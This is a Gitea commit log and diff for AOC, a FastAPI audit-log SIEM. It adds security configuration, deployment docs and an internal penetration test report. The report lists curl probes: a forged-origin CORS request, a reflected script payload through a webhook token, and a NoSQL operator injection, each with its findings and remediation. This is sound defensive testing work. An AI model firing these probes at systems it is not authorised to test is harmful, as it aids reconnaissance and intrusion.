33 Commits
v1.6.0 ... main

Author SHA1 Message Date
fe95dfcfce docs: update AGENTS.md, README.md, DEPLOY.md, ROADMAP.md for v1.7.14 security features
All checks were successful
Release / build-and-push (push) Successful in 21s
CI / lint-and-test (push) Successful in 25s
2026-04-27 16:52:35 +02:00
8d951fc335 v1.7.14: LLM/SIEM domain allowlists, SRI hashes, auth misconfig warning, Azure Key Vault integration
All checks were successful
CI / lint-and-test (push) Successful in 22s
Release / build-and-push (push) Successful in 1m7s
2026-04-27 16:45:06 +02:00
35eca65234 v1.7.13: switch Alpine.js to CSP build, remove unsafe-eval from CSP
All checks were successful
Release / build-and-push (push) Successful in 40s
CI / lint-and-test (push) Successful in 33s
2026-04-27 16:08:34 +02:00
07a841615b v1.7.12: security hardening — CORS fix, security headers, fail-closed rate limiter, OpenAPI docs disabled by default, config auth privacy, webhook validation
All checks were successful
Release / build-and-push (push) Successful in 44s
CI / lint-and-test (push) Successful in 22s
2026-04-27 14:19:28 +02:00
c086fa4260 hotfix(v1.7.11): add unsafe-eval to CSP for Alpine.js
All checks were successful
CI / lint-and-test (push) Successful in 1m26s
Release / build-and-push (push) Successful in 3m1s
2026-04-27 10:39:33 +02:00
be700fefc3 hotfix(v1.7.10): add font-src to CSP for data URI fonts
All checks were successful
CI / lint-and-test (push) Successful in 1m29s
Release / build-and-push (push) Successful in 2m53s
2026-04-27 10:32:35 +02:00
e2cea50d87 hotfix(v1.7.9): auth diagnostics and rate-limit exemptions
All checks were successful
CI / lint-and-test (push) Successful in 2m30s
Release / build-and-push (push) Successful in 4m46s
- Exempt /api/config/auth, /api/config/features, /health, /metrics from rate limiting
- Fix generic exception handler to return proper JSON for HTTPException instead of re-raising
- Add startup log with auth_enabled and version
- Add frontend console logging for auth config fetch errors
- Show 'Auth: OFF' or 'Auth: misconfigured' on auth button instead of empty text
- Add backend debug logging to /api/config/auth endpoint
2026-04-27 10:09:44 +02:00
7fe53f882a hotfix(v1.7.8): restore CORS wildcard and fix CSP for MSAL auth
All checks were successful
CI / lint-and-test (push) Successful in 51s
Release / build-and-push (push) Successful in 2m4s
- Revert automatic CORS wildcard stripping that broke production deployments
  with CORS_ORIGINS=* (now logs a warning but preserves the config)
- Expand CSP headers to allow MSAL auth flows:
  - connect-src: login.microsoftonline.com
  - frame-src: login.microsoftonline.com
  - form-action: login.microsoftonline.com
2026-04-27 09:41:28 +02:00
d01e7801ed security: v1.7.7 hardening release
All checks were successful
CI / lint-and-test (push) Successful in 51s
Release / build-and-push (push) Successful in 1m57s
- Add WEBHOOK_CLIENT_SECRET validation for Graph webhooks
- Add Redis-backed rate limiting (fetch/ask/write/default tiers)
- Validate LLM_BASE_URL to prevent SSRF (HTTPS only, block private IPs)
- Enforce non-wildcard CORS when AUTH_ENABLED=true
- Add Content-Security-Policy headers
- Fix audit middleware to use verified JWT claims via contextvars
- Cap bulk_tags updates to 10,000 documents
- Return generic error messages to clients (no internal detail leakage)
- Strict AlertCondition Pydantic model for alert rules
- Security warning on MCP stdio server startup
- Remove MongoDB/Redis host ports from docker-compose
- Remove mongo_query from /ask API response
2026-04-27 09:16:57 +02:00
7cd7709b4a fix: dedupe alert_rules before creating unique index in setup_indexes()
All checks were successful
CI / lint-and-test (push) Successful in 1m7s
Release / build-and-push (push) Successful in 2m25s
The unique index on alert_rules.name was being created before duplicates
were cleaned up, causing DuplicateKeyError on startup when existing
duplicates were present. Move deduplication into setup_indexes() so it
runs before the unique index is created.

v1.7.6
2026-04-22 15:20:19 +02:00
9cd50d1257 chore: bump version to 1.7.5
All checks were successful
CI / lint-and-test (push) Successful in 30s
Release / build-and-push (push) Successful in 1m29s
2026-04-22 15:13:55 +02:00
646d61f72e fix: dedupe existing rules + unique index to prevent duplicates
- Add unique index on alert_rules.name in setup_indexes()
- seed_default_rules() now removes duplicates by name before upserting
- Keeps the oldest document (_id ascending) when deduping
2026-04-22 15:13:41 +02:00
5f7a98f21c chore: bump version to 1.7.4
All checks were successful
CI / lint-and-test (push) Successful in 28s
Release / build-and-push (push) Successful in 1m30s
2026-04-22 14:57:06 +02:00
19ed231a31 fix: prevent duplicate default rules on multi-worker startup
- Replace insert_many with replace_one(..., upsert=True) keyed by rule name
- Safe for concurrent startup with multiple gunicorn workers
2026-04-22 14:56:53 +02:00
f812fda150 chore: bump version to 1.7.3
All checks were successful
CI / lint-and-test (push) Successful in 44s
Release / build-and-push (push) Successful in 1m40s
2026-04-22 14:48:17 +02:00
a194c78c59 feat: all panels are now collapsible
- Source Health, Alerts, Alert Rules, Filters, Ask, Events panels all collapsible
- Click panel header to expand/collapse
- Chevron indicator rotates to show state
- Collapsed state persisted to localStorage (aoc_panels key)
2026-04-22 14:48:03 +02:00
e984899d4c chore: bump version to 1.7.2
All checks were successful
Release / build-and-push (push) Successful in 1m39s
CI / lint-and-test (push) Successful in 43s
2026-04-22 14:43:13 +02:00
b618cb29ea feat: alert rules management UI
- Add Alert Rules panel between Alerts and Filters sections
- List all rules with severity badge, on/off toggle, conditions preview
- Add Rule button opens modal with form for name, severity, message, conditions
- Edit existing rules inline
- Delete rules with confirmation
- Condition builder supports eq, neq, contains, in, after_hours operators
2026-04-22 14:42:58 +02:00
3e1416cd52 chore: bump version to 1.7.1
All checks were successful
CI / lint-and-test (push) Successful in 31s
Release / build-and-push (push) Successful in 1m32s
2026-04-22 14:21:46 +02:00
94983c43e9 fix: alert panel always visible, version display normalization
- Remove x-show condition hiding alert panel when no alerts exist
- Add empty state message explaining alerts appear on rule triggers
- Normalize appVersion in loadVersion() to strip leading 'v' (prevents vv1.7.0 in footer)
2026-04-22 14:21:34 +02:00
0a16cf6870 chore: bump version to 1.7.0
All checks were successful
CI / lint-and-test (push) Successful in 26s
Release / build-and-push (push) Successful in 1m15s
2026-04-22 14:12:49 +02:00
e348881083 feat: Admin Operations SIEM — alerts, notifications, pre-built rules
- Add pluggable notification system (webhook, Slack, Teams) with retry
- Add alert deduplication: same rule + actor within 15 min = one alert
- Add 10 pre-built admin-ops rule templates seeded on startup:
  - Failed Conditional Access, After-Hours Admin Activity
  - New Application Registration, Admin Role Assignment
  - License Change, Bulk User Deletion
  - Device Compliance Failure, Exchange Transport Rule Change
  - Service Principal Credential Added, External Sharing Enabled
- Add /api/alerts, /api/alerts/{id}/status, /api/alerts/summary endpoints
- Add alert dashboard to frontend with status filters and ack/resolve buttons
- Add alert summary badge in hero header (high/medium/low counts)
- New env vars: ALERT_WEBHOOK_URL, ALERT_WEBHOOK_FORMAT, ALERT_DEDUPE_MINUTES
2026-04-22 14:12:36 +02:00
a220494bcf docs: add Phase 6 multi-tenancy plan to roadmap
All checks were successful
CI / lint-and-test (push) Successful in 43s
- Row-level isolation architecture
- Per-tenant Entra + Graph credentials
- License-gated premium feature
- Deferred until SIEM export and alerting are production-tested
2026-04-22 13:49:56 +02:00
5bda1dd616 chore: bump version to 1.6.4
All checks were successful
CI / lint-and-test (push) Successful in 25s
Release / build-and-push (push) Successful in 1m29s
2026-04-22 12:16:32 +02:00
3e333291c6 fix: revert to single-click service filter, show all services by default, page size 24
- Revert +/- buttons on service pills back to single-click = filter only this service
- Remove default exclusion of Exchange/SharePoint/Teams (privacy controls handle this server-side)
- Change default page size from 25 to 24 (divisible by 3 for the 3-column grid)
- Update DEFAULT_PAGE_SIZE config default to 24
2026-04-22 12:16:20 +02:00
aa62528862 chore: bump version to 1.6.3
All checks were successful
CI / lint-and-test (push) Successful in 35s
Release / build-and-push (push) Successful in 1m47s
2026-04-22 12:02:28 +02:00
ac155d8843 feat: +/- buttons on service pills for additive/subtractive filtering
- Replace single-click service pill filter with explicit +/− buttons
- '+' adds the service to the current filter (keeps other selections)
- '−' removes the service from the current filter
- Result pills keep toggle click behavior
- Add .pill__action styles for small inline buttons
2026-04-22 12:02:11 +02:00
ed7465f5cd chore: bump version to 1.6.2
All checks were successful
Release / build-and-push (push) Successful in 1m33s
CI / lint-and-test (push) Successful in 33s
2026-04-22 11:53:21 +02:00
0eebcd0765 feat: clickable pills, configurable page size, CQRE.NET branding
- Service/category pills are now clickable: click to filter by that service
- Result pills (Success, Failure, etc.) are now clickable: click to filter by that result
- Click again to clear the filter (toggle behavior)
- Change default page size from 100 to 25
- Add DEFAULT_PAGE_SIZE config (env var, default 25), exposed via /api/config/features
- Change footer brand from CQRE to CQRE.NET
- Add pill--clickable hover styles
- Bump CSS cache-buster to v=10
2026-04-22 11:53:01 +02:00
67f3c28e82 chore: bump version to 1.6.1
All checks were successful
CI / lint-and-test (push) Successful in 32s
Release / build-and-push (push) Successful in 1m30s
2026-04-22 11:31:57 +02:00
04c41ee740 style: UI polish — topbar, footer, user info, product feel
- Add sticky top navigation bar with brand, repo/docs links, user chip
- Show logged-in user name + email from MSAL account
- Add footer with version, issue link, repo link, docs link
- Move action buttons (Fetch/Refresh/Login) to compact topbar
- Clean up hero section (removed buttons, just title + tagline)
- Bump CSS cache-buster to v=9
- Responsive stacking for mobile
2026-04-22 11:31:37 +02:00
cbd46adaa6 style: ruff format
All checks were successful
CI / lint-and-test (push) Successful in 25s
2026-04-22 10:08:32 +02:00
e4bafbc4b0 chore: fix ruff import order in test_ask.py
Some checks failed
CI / lint-and-test (push) Failing after 19s
2026-04-22 10:06:07 +02:00
38 changed files with 2907 additions and 103 deletions

View File

@@ -27,6 +27,18 @@ RETENTION_DAYS=0
# Optional: comma-separated CORS origins (e.g., http://localhost:3000,https://app.example.com)
CORS_ORIGINS=*
# OpenAPI docs exposure (set true only for dev)
DOCS_ENABLED=false
# LLM endpoint domain restriction (comma-separated, supports wildcards like *.openai.azure.com)
# LLM_ALLOWED_DOMAINS=api.openai.com,*.openai.azure.com
# SIEM webhook domain restriction (comma-separated)
# SIEM_ALLOWED_DOMAINS=your-siem.com
# Optional Azure Key Vault for secrets storage
# AZURE_KEY_VAULT_NAME=your-keyvault-name
# Optional: SIEM export webhook (e.g., Splunk HEC, Sentinel, or generic syslog webhook)
SIEM_ENABLED=false
SIEM_WEBHOOK_URL=
@@ -55,6 +67,19 @@ LLM_API_VERSION=
# For local dev, start Valkey with: docker run -d -p 6379:6379 valkey/valkey:8-alpine
REDIS_URL=redis://localhost:6379/0
# UI default page size (number of events shown per page)
DEFAULT_PAGE_SIZE=24
# Alert notifications (optional)
# Send triggered admin-ops alerts to a webhook (Slack, Teams, or generic)
ALERT_WEBHOOK_URL=
ALERT_WEBHOOK_FORMAT=generic # generic | slack | teams
ALERT_DEDUPE_MINUTES=15
# Webhook security (optional but strongly recommended)
# Set this to the same clientState used when creating Graph subscriptions
WEBHOOK_CLIENT_SECRET=
# Optional: privacy / access control
# Hide entire services from users without PRIVACY_SERVICE_ROLES
# PRIVACY_SERVICES=Exchange,Teams

View File

@@ -9,20 +9,24 @@ AOC is a FastAPI microservice that ingests Microsoft Entra (Azure AD) audit logs
- **Runtime**: Python 3.11 (3.14 for tests)
- **Web Framework**: FastAPI + Uvicorn (Gunicorn in production)
- **Database**: MongoDB (PyMongo)
- **Cache/Queue**: Valkey/Redis 8 (caching + arq async job queue)
- **Frontend**: Alpine.js + HTML/CSS (served as static files from `backend/frontend/`)
- **Authentication**: Optional OIDC Bearer token validation against Microsoft Entra (using `python-jose` and MSAL.js on the frontend)
- **External APIs**: Microsoft Graph API, Office 365 Management Activity API, Azure OpenAI / MS Foundry
- **Deployment**: Docker Compose (dev), Docker Compose + nginx (prod)
- **CI/CD**: Gitea Actions (lint + test + Docker build + release)
- **Secrets Storage**: Environment variables (`.env`) or optional Azure Key Vault
## Project Structure
```
backend/
main.py # FastAPI app, router registration, background periodic fetch
config.py # Pydantic Settings configuration (loads .env)
config.py # Pydantic Settings configuration (loads .env + optional Key Vault)
database.py # MongoClient setup (db = micro_soc, collection = events)
auth.py # OIDC Bearer token validation, JWKS caching, role/group checks
secrets_manager.py # Optional Azure Key Vault integration for secrets
rate_limiter.py # Redis-backed fixed-window rate limiter (fail-closed)
requirements.txt # Python dependencies
Dockerfile # python:3.11-slim image, non-root user, version baked at build
mcp_server.py # Standalone MCP server for Claude Desktop / Cursor integration
@@ -34,6 +38,9 @@ backend/
health.py # GET /health, GET /metrics
rules.py # Rule-based alerting endpoints
webhooks.py # Microsoft Graph change notification webhooks
alerts.py # Alert management endpoints
saved_searches.py # Saved filter presets
jobs.py # Async job status polling
graph/
auth.py # Client credentials token acquisition for Graph
audit_logs.py # Fetch and enrich directory audit logs from Graph
@@ -59,16 +66,42 @@ Copy `.env.example` to `.env` at the repo root and fill in values:
cp .env.example .env
```
Key variables:
### Core variables
- `TENANT_ID`, `CLIENT_ID`, `CLIENT_SECRET` — Microsoft app registration credentials (application permissions)
- `AUTH_ENABLED` — set `true` to protect API/UI with OIDC Bearer tokens
- `AUTH_TENANT_ID`, `AUTH_CLIENT_ID` — token validation audience/issuer
- `AUTH_ALLOWED_ROLES`, `AUTH_ALLOWED_GROUPS` — comma-separated access control lists
- `ENABLE_PERIODIC_FETCH`, `FETCH_INTERVAL_MINUTES` — background ingestion scheduler
- `MONGO_ROOT_USERNAME`, `MONGO_ROOT_PASSWORD`, `MONGO_PORT` — used by Docker Compose for MongoDB
### AI / LLM variables
- `AI_FEATURES_ENABLED` — set `false` to completely disable AI endpoints and UI (default `true`)
- `LLM_API_KEY`, `LLM_BASE_URL`, `LLM_MODEL`, `LLM_MAX_EVENTS`, `LLM_TIMEOUT_SECONDS` — LLM provider settings
- `LLM_API_VERSION` — required for Azure OpenAI / MS Foundry endpoints
- `LLM_ALLOWED_DOMAINS` — comma-separated domain allowlist for LLM endpoints (e.g. `api.openai.com,*.openai.azure.com`)
### Security variables
- `CORS_ORIGINS` — comma-separated allowed origins (default `*`; set explicit origins in production)
- `DOCS_ENABLED` — set `true` to expose `/docs`, `/redoc`, `/openapi.json` (default `false`)
- `METRICS_ALLOWED_IPS` — comma-separated CIDRs allowed to access `/metrics` (default: private networks + loopback)
- `WEBHOOK_CLIENT_SECRET` — secret for validating Graph webhook `clientState`
- `SIEM_ENABLED`, `SIEM_WEBHOOK_URL` — optional SIEM forwarding
- `SIEM_ALLOWED_DOMAINS` — comma-separated domain allowlist for SIEM webhook URLs
- `RATE_LIMIT_ENABLED`, `RATE_LIMIT_REQUESTS`, `RATE_LIMIT_WINDOW_SECONDS` — Redis-backed rate limiting
### Optional Azure Key Vault
- `AZURE_KEY_VAULT_NAME` — name of the Azure Key Vault to load secrets from
- When set, AOC fetches these secrets at startup:
- `aoc-client-secret``CLIENT_SECRET`
- `aoc-llm-api-key``LLM_API_KEY`
- `aoc-mongo-uri``MONGO_URI`
- `aoc-webhook-client-secret``WEBHOOK_CLIENT_SECRET`
- Requires `azure-identity` and `azure-keyvault-secrets` (uncomment in `requirements.txt`)
### Privacy / access control
- `PRIVACY_SERVICES` — comma-separated services to hide from non-privileged users (e.g. `Exchange,Teams`)
- `PRIVACY_SENSITIVE_OPERATIONS` — comma-separated operations to gate
- `PRIVACY_SERVICE_ROLES` — comma-separated Entra roles that grant access to privacy data
## Build and Run Commands
@@ -102,7 +135,9 @@ uvicorn main:app --reload --host 0.0.0.0 --port 8000
- `GET /api/config/features` — feature flags (`ai_features_enabled`)
- `POST /api/ask` — natural language query; returns LLM narrative + referenced events (only when `AI_FEATURES_ENABLED=true`)
- `GET /health` — liveness probe with DB connectivity
- `GET /metrics` — Prometheus metrics
- `GET /metrics` — Prometheus metrics (IP-restricted by default)
- `GET /api/source-health` — last fetch status per ingestion source
- `GET /api/version` — running version
## MCP Server
@@ -162,16 +197,30 @@ When adding new features or bug fixes, add or update tests in `backend/tests/`.
- Auth middleware and token validation
- API endpoints (`/api/events`, `/api/fetch-audit-logs`, `/api/ask`)
- NLQ time range extraction, entity extraction, query building
- Rate limiting behavior
## Security Considerations
- **Secrets**: `CLIENT_SECRET`, `LLM_API_KEY`, and other credentials come from `.env`. Never commit `.env`.
- **Auth validation**: When `AUTH_ENABLED=true`, the backend fetches JWKS from `https://login.microsoftonline.com/{AUTH_TENANT_ID}/v2.0/.well-known/openid-configuration`, caches keys for 1 hour, and validates tenant/issuer claims. Tokens are decoded without strict signature verification (`jwt.get_unverified_claims`), so the tenant and issuer checks are the primary gate.
- **Role/Group gating**: Access is allowed if the tokens `roles` intersect `AUTH_ALLOWED_ROLES` or `groups` intersect `AUTH_ALLOWED_GROUPS`. If neither list is configured, all authenticated users are allowed.
- **Secrets**: `CLIENT_SECRET`, `LLM_API_KEY`, and other credentials come from `.env` or Azure Key Vault. Never commit `.env`.
- **Auth validation**: When `AUTH_ENABLED=true`, the backend fetches JWKS from `https://login.microsoftonline.com/{AUTH_TENANT_ID}/v2.0/.well-known/openid-configuration`, caches keys for 1 hour, and validates tenant/issuer/audience claims. Tokens are decoded with RS256 signature verification.
- **Role/Group gating**: Access is allowed if the token's `roles` intersect `AUTH_ALLOWED_ROLES` or `groups` intersect `AUTH_ALLOWED_GROUPS`. If neither list is configured, all authenticated users are allowed — a startup warning is logged in this case.
- **CORS**: When `AUTH_ENABLED=true` and `CORS_ORIGINS="*"`, `allow_credentials` is forced to `false` to prevent cross-origin token leakage.
- **Rate limiting**: Redis-backed fixed-window rate limiting with per-category limits (fetch=10/hr, ask=30/min, write=20/min, default=120/min). Fails closed (returns 429) when Redis is unavailable.
- **Pagination limits**: `page_size` is clamped to a maximum of 500 to prevent large queries.
- **Fetch window cap**: `hours` is clamped to 720 (30 days) to avoid runaway API calls.
- **LLM SSRF guard**: `LLM_BASE_URL` must be HTTPS and cannot point to private IPs. Optional `LLM_ALLOWED_DOMAINS` restricts to specific domains.
- **SIEM SSRF guard**: `SIEM_WEBHOOK_URL` has the same validation as LLM URLs, plus optional `SIEM_ALLOWED_DOMAINS`.
- **Metrics IP gating**: `/metrics` is restricted to private/loopback IPs by default via `METRICS_ALLOWED_IPS`.
- **OpenAPI docs**: Disabled by default (`DOCS_ENABLED=false`). Enable only in development.
- **CSP**: Content-Security-Policy headers are set on all responses. `unsafe-eval` is required for Alpine.js v3 expression evaluation.
- **SRI**: CDN scripts (Alpine.js, MSAL.js) include Subresource Integrity hashes to prevent supply chain compromise.
- **MCP server**: The MCP server bypasses auth entirely. Only run it in trusted environments or behind a VPN.
### Security Documentation
- `PEN_TEST_REPORT_v1.7.11.md` — Internal soft penetration test findings and remediation
- `THREAT_MODEL_v1.7.13.md` — Comprehensive threat model covering Entra/token abuse vectors
## Maintenance and Operations
The `backend/maintenance.py` script provides two CLI commands useful for backfilling or correcting stored data:

View File

@@ -7,6 +7,7 @@ AOC runs as a set of Docker containers orchestrated by Docker Compose:
- **nginx** — reverse proxy, TLS termination, static file serving
- **backend** — FastAPI application (Gunicorn + Uvicorn workers)
- **mongo** — MongoDB data store (not exposed externally)
- **valkey** — Redis-compatible cache and async job queue (not exposed externally)
## Prerequisites
@@ -20,7 +21,7 @@ AOC runs as a set of Docker containers orchestrated by Docker Compose:
1. **Clone / pull the latest release**
```bash
git checkout v1.1.0
git checkout v1.7.14
```
2. **Copy and edit environment variables**
@@ -33,7 +34,7 @@ AOC runs as a set of Docker containers orchestrated by Docker Compose:
3. **Set the release version**
```bash
export AOC_VERSION=v1.1.0
export AOC_VERSION=v1.7.14
```
4. **Deploy**
@@ -53,7 +54,7 @@ AOC runs as a set of Docker containers orchestrated by Docker Compose:
## Updating to a new release
```bash
export AOC_VERSION=v1.2.0
export AOC_VERSION=v1.7.14
docker compose -f docker-compose.prod.yml pull
docker compose -f docker-compose.prod.yml up -d
```
@@ -75,24 +76,56 @@ docker compose -f docker-compose.prod.yml up -d
Replace the `nginx` service in `docker-compose.prod.yml` with a Certbot-friendly setup (e.g., use the `nginx-proxy` + `acme-companion` stack) or mount the Certbot certificates into `nginx/ssl/`.
## Security hardening
## Security Hardening
- MongoDB is **not exposed** to the host — only the backend container can reach it.
- Valkey/Redis is **not exposed** to the host — only the backend container can reach it.
- The backend runs as a non-root (`aoc`) user inside the container.
- nginx adds security headers (`X-Frame-Options`, `X-Content-Type-Options`, etc.).
- Keep `.env` out of version control — it is listed in `.gitignore`.
- Set `AUTH_ENABLED=true` and configure `AUTH_ALLOWED_ROLES` or `AUTH_ALLOWED_GROUPS` to restrict access to admin/security roles.
- Set explicit `CORS_ORIGINS` — do not use `*` in production when auth is enabled.
- Set `DOCS_ENABLED=false` to hide OpenAPI docs (`/docs`, `/openapi.json`).
- Configure `WEBHOOK_CLIENT_SECRET` to validate Graph webhook notifications.
- Set `LLM_ALLOWED_DOMAINS` if using AI features (e.g. `api.openai.com,*.openai.azure.com`).
- Set `SIEM_ALLOWED_DOMAINS` if using SIEM forwarding.
- Review `METRICS_ALLOWED_IPS` — defaults to private networks + loopback.
## Azure Key Vault (Optional)
To eliminate long-lived secrets from `.env`:
1. Create an Azure Key Vault and add these secrets:
- `aoc-client-secret` — your Graph app `CLIENT_SECRET`
- `aoc-llm-api-key` — your `LLM_API_KEY` (if using AI)
- `aoc-mongo-uri` — your `MONGO_URI`
- `aoc-webhook-client-secret` — your `WEBHOOK_CLIENT_SECRET`
2. Uncomment `azure-identity` and `azure-keyvault-secrets` in `backend/requirements.txt`
3. Set `AZURE_KEY_VAULT_NAME=your-keyvault-name` in `.env`
4. Grant the container identity `Get` permission on secrets:
- If using Azure Container Instances / AKS: assign a managed identity
- If using VM: assign a managed identity or use a service principal
- If using local Docker: authenticate via `az login` on the host
5. Rebuild and redeploy:
```bash
docker compose -f docker-compose.prod.yml up -d --build
```
## Rollback
```bash
export AOC_VERSION=v1.0.3
export AOC_VERSION=v1.7.13
docker compose -f docker-compose.prod.yml pull
docker compose -f docker-compose.prod.yml up -d
```
## Monitoring
- Prometheus metrics: `http://your-host/metrics`
- Prometheus metrics: `http://your-host/metrics` (IP-restricted by default)
- Health check: `http://your-host/health`
- Container logs:
@@ -100,4 +133,13 @@ docker compose -f docker-compose.prod.yml up -d
docker compose -f docker-compose.prod.yml logs -f backend
docker compose -f docker-compose.prod.yml logs -f nginx
docker compose -f docker-compose.prod.yml logs -f mongo
docker compose -f docker-compose.prod.yml logs -f valkey
```
## Troubleshooting
- **Auth warning in logs**: "AUTH_ENABLED is true but no AUTH_ALLOWED_ROLES or AUTH_ALLOWED_GROUPS are configured" — set these to restrict access.
- **CORS issues**: Set `CORS_ORIGINS` to your exact frontend origin(s). Wildcard with auth enabled disables credentials.
- **Rate limiting 429s**: Check Redis/Valkey connectivity. The rate limiter fails closed (returns 429) when Redis is down.
- **LLM errors**: Verify `LLM_BASE_URL` is in `LLM_ALLOWED_DOMAINS` if the allowlist is configured.
- **SIEM not forwarding**: Verify `SIEM_WEBHOOK_URL` uses HTTPS and is in `SIEM_ALLOWED_DOMAINS`.

203
PEN_TEST_REPORT_v1.7.11.md Normal file
View File

@@ -0,0 +1,203 @@
# AOC v1.7.11 Soft Penetration Test Report
**Date:** 2026-04-27
**Target:** Local AOC instance (port 8001), auth disabled, AI disabled
**Tester:** Automated + manual curl-based probing
**Scope:** FastAPI backend, REST API endpoints, middleware, headers
---
## Executive Summary
AOC v1.7.11 has one **CRITICAL** vulnerability (CORS credentials leak) and several defense-in-depth gaps. The good news: input validation, NoSQL injection resistance, and error handling are solid. The bad news: CORS is dangerously permissive, security headers are missing, and the rate limiter fails open on Redis failure.
| Severity | Count | Categories |
|----------|-------|------------|
| CRITICAL | 1 | CORS with credentials |
| HIGH | 1 | Missing security headers |
| MEDIUM | 2 | Fail-open rate limiter, OpenAPI exposure |
| LOW | 2 | Information disclosure, webhook content injection |
| INFO | 3 | Positive findings (no stack traces, input validation, NoSQL resistance) |
---
## CRITICAL
### 1. CORS Reflects Any Origin with `allow_credentials=true`
**Finding:** The CORS middleware returns `Access-Control-Allow-Origin: <any origin>` AND `Access-Control-Allow-Credentials: true` for every origin that sends an `Origin` header.
**Evidence:**
```bash
curl -H "Origin: https://evil-attacker.com" http://localhost:8001/api/config/auth
# Response headers:
# access-control-allow-origin: https://evil-attacker.com
# access-control-allow-credentials: true
```
**Impact:** An attacker can host a malicious page on any domain and make authenticated cross-origin requests to the AOC API using the victim's browser cookies/tokens. This effectively bypasses Same-Origin Policy for authenticated actions.
**Root Cause:** `main.py` configures CORS with `allow_origins=["*"]` (from `CORS_ORIGINS` env var, default `"*"`) AND `allow_credentials=True`. According to CORS spec, a wildcard origin with credentials is technically invalid, but Starlette/FastAPI appears to reflect the request origin instead.
**Recommendation:**
- When `AUTH_ENABLED=true`, reject requests from origins not in an explicit allowlist.
- Set `allow_credentials=False` if wildcard origins are needed.
- Or, require `CORS_ORIGINS` to be explicitly configured (no default wildcard) when auth is enabled.
---
## HIGH
### 2. Missing Security Headers
**Finding:** The following security headers are absent from all responses:
| Header | Purpose | Status |
|--------|---------|--------|
| `X-Content-Type-Options: nosniff` | Prevents MIME sniffing | MISSING |
| `X-Frame-Options: DENY` or `SAMEORIGIN` | Clickjacking protection | MISSING |
| `Strict-Transport-Security` | HSTS enforcement | MISSING |
| `Referrer-Policy: strict-origin-when-cross-origin` | Limits referrer leakage | MISSING |
| `Permissions-Policy` | Restricts browser features | MISSING |
**Impact:** Increased attack surface for clickjacking, MIME confusion attacks, and information leakage via referrer headers.
**Recommendation:** Add a security headers middleware to set these on all responses. HSTS only when served over HTTPS.
---
## MEDIUM
### 3. Rate Limiter Fails Open on Redis Failure
**Finding:** In `rate_limiter.py` line 81-82:
```python
except Exception as exc:
logger.warning("Rate limiter Redis error; allowing request", error=str(exc))
```
If Redis becomes unreachable, all rate limits are silently bypassed.
**Evidence:** When Redis was down, 150+ requests to `/api/events` all returned 200 with no 429s.
**Impact:** A DoS on Redis (or a network partition) removes all rate limiting, allowing unlimited API abuse.
**Recommendation:** Make the rate limiter fail-closed: return 429 or 503 when Redis is unavailable, or use an in-memory fallback with a conservative limit.
### 4. OpenAPI Schema Publicly Exposed
**Finding:** `/docs`, `/redoc`, and `/openapi.json` are accessible without authentication and return the full API schema.
**Evidence:**
```bash
curl -s http://localhost:8001/openapi.json | jq '.paths | keys'
# Returns all 15+ API paths including internal endpoints
```
**Impact:** Attackers get a complete map of the API, including request/response schemas, parameter types, and endpoint structure. This significantly reduces reconnaissance time.
**Recommendation:** Disable OpenAPI docs in production (`docs_url=None, redoc_url=None, openapi_url=None`) or gate them behind admin authentication.
---
## LOW
### 5. Information Disclosure via `/api/config/auth` and `/metrics`
**Finding:**
- `/api/config/auth` leaks `tenant_id` and `client_id` even when auth is disabled. These values fall back to the Graph API credentials (`TENANT_ID`/`CLIENT_ID`), which may be sensitive.
- `/metrics` exposes Python version (`3.14.3`), GC statistics, and application-internal metric names.
**Evidence:**
```json
{
"auth_enabled": false,
"tenant_id": "0ec9f34c-17c8-4541-b084-7d64ecdcc997",
"client_id": "cc31fd45-1eca-431f-a2c6-ba81cd4c5d50"
}
```
**Impact:** Low direct impact (tenant/client IDs are not secrets), but aids reconnaissance and narrows the attack surface.
**Recommendation:**
- Return empty strings for `tenant_id`/`client_id` when `auth_enabled=false`.
- Gate `/metrics` behind IP allowlist or admin auth (standard Prometheus practice).
### 6. Webhook Validation Token Echoed Without Sanitization
**Finding:** The `/api/webhooks/graph` endpoint echoes `validationToken` query parameter as `text/plain` without any sanitization or length limits.
**Evidence:**
```bash
curl -X POST "http://localhost:8001/api/webhooks/graph?validationToken=<script>alert(1)</script>"
# Returns: <script>alert(1)</script> with Content-Type: text/plain
```
**Impact:** Low in the intended Microsoft Graph flow (token is Microsoft-generated), but if the endpoint is hit directly, an attacker could use this for cache poisoning, response splitting, or social engineering by making the endpoint return attacker-controlled content.
**Recommendation:** Validate the validationToken format (e.g., JWT-like structure, length limits) before echoing, or set `Content-Type: text/plain; charset=utf-8` with `X-Content-Type-Options: nosniff` to reduce MIME confusion risk.
---
## INFO (Positive Findings)
### A. No Stack Traces in Error Responses
All errors (422, 404, 429, 500 if triggered) return generic JSON messages without internal details or stack traces. Good.
### B. Pydantic Input Validation is Effective
- `page_size` capped at 500 (returns 422 for 501, 0, -1)
- `hours` capped at 720 (returns 422 for 721)
- Invalid cursors return 400 with "Invalid cursor"
- Malformed JSON bodies return 422 with field-level validation errors
- `AlertCondition` op field strictly validated against `Literal["eq", "neq", "contains", "in", "after_hours"]`
### C. NoSQL Injection Resistant
MongoDB operators passed as string filter values are treated as literals, not operators:
```bash
curl "http://localhost:8001/api/events?operation=\$ne"
# Returns 0 results (treated as literal string "$ne")
```
The `_build_query()` function in `events.py` uses `re.escape()` for search input and constructs queries safely.
### D. Bulk Tags Pre-Count Check Works
`bulk_tags` endpoint capped at 10,000 matched documents via pre-count check. 93 events were successfully tagged with no bypass.
### E. Rate Limiting Works When Redis is Healthy
- `/api/fetch-audit-logs`: 429 after 11 requests (limit: 10/hr)
- `/api/events`: 429 after ~120 requests (limit: 120/min)
- Exempt paths work correctly: `/health`, `/metrics`, `/api/config/auth`, `/api/config/features`
- `Retry-After` header is returned on 429 responses
---
## Recommendations Summary
| Priority | Action | Effort |
|----------|--------|--------|
| P0 | Fix CORS: do not allow credentials with wildcard/reflected origins | Small |
| P1 | Add security headers middleware (X-Content-Type-Options, X-Frame-Options, HSTS, Referrer-Policy) | Small |
| P2 | Make rate limiter fail-closed on Redis errors | Small |
| P2 | Disable OpenAPI docs in production or gate behind auth | Small |
| P3 | Sanitize or validate webhook validationToken before echo | Small |
| P3 | Gate `/metrics` behind IP allowlist | Small |
| P3 | Hide tenant_id/client_id from `/api/config/auth` when auth is disabled | Tiny |
| P4 | Consider Alpine.js CSP build to remove `unsafe-eval` from script-src | Medium |
---
## Test Environment
```
Backend: uvicorn on localhost:8001 (auth=false, ai=false)
MongoDB: docker container, port 27018
Redis: docker container, port 6380
```
*Test commands and raw outputs available in `/tmp/pen_test*.sh` scripts.*

View File

